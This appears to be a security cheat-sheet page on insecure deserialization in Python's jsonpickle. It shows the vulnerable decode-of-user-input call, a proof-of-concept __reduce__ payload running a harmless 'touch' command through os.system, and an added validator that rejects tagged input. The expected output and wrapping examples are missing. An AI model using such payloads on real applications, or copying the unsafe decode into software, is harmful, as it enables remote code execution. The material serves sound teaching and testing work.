Python JSONPickle

Function responsible for Insecure Deserialization

If the application performs no validation or sanitization before decoding a user-supplied pickle, it is vulnerable.

jsonpickle.decode(USER_INPUT) # vulnerable code
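
One way to perform the check mentioned above before any decoder sees the input. This is an added example, not code from the original page; it assumes jsonpickle marks typed nodes with keys beginning with "py/", and the names find_tags, load_untrusted and UnsafePayload are hypothetical:

```python
import json

# Assumption: jsonpickle marks every typed node with a key such as
# "py/object" or "py/reduce"; plain data never needs those keys.
TAG_PREFIX = "py/"


class UnsafePayload(ValueError):
    """Raised when untrusted input carries jsonpickle type tags."""


def find_tags(node, path="$"):
    """Yield (path, key) for each dict key that starts with TAG_PREFIX."""
    if isinstance(node, dict):
        for key, value in node.items():
            if key.startswith(TAG_PREFIX):
                yield path, key
            yield from find_tags(value, f"{path}.{key}")
    elif isinstance(node, list):
        for index, item in enumerate(node):
            yield from find_tags(item, f"{path}[{index}]")


def load_untrusted(text):
    """Parse untrusted text as plain JSON and refuse any tagged node.

    The parsed value is returned and the raw text is discarded, so the
    data that was checked is the same data the application goes on to use.
    """
    data = json.loads(text)
    tags = list(find_tags(data))
    if tags:
        raise UnsafePayload(f"type tags in untrusted input: {tags}")
    return data


# Constructed sample inputs (not taken from the page).
BENIGN = '{"user": "alice", "roles": ["admin", "dev"]}'
TAGGED = '{"profile": {"py/reduce": [{"py/function": "builtins.print"}]}}'

if __name__ == "__main__":
    print(load_untrusted(BENIGN))
    try:
        load_untrusted(TAGGED)
    except UnsafePayload as exc:
        print("rejected:", exc)
```

Because load_untrusted returns plain dicts, lists and scalars, the request body never has to be passed to jsonpickle.decode at all.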

Malicious object

To create a malicious object that can execute system commands, you can use the script below:

import os
import jsonpickle

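class Shell(object):
    # __reduce__ returns (callable, args); the decoder calls
    # callable(*args) when it rebuilds the object.
    def __reduce__(self):
        return (os.system, ("touch /tmp/deser",))

# Serialize the object to its jsonpickle JSON form.
print(jsonpickle.dumps(Shell()))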

The output should look like this:

Depending on the application flow, you should encode the payload accordingly and/or wrap it inside the object the application expects.

Sample object wrapping:
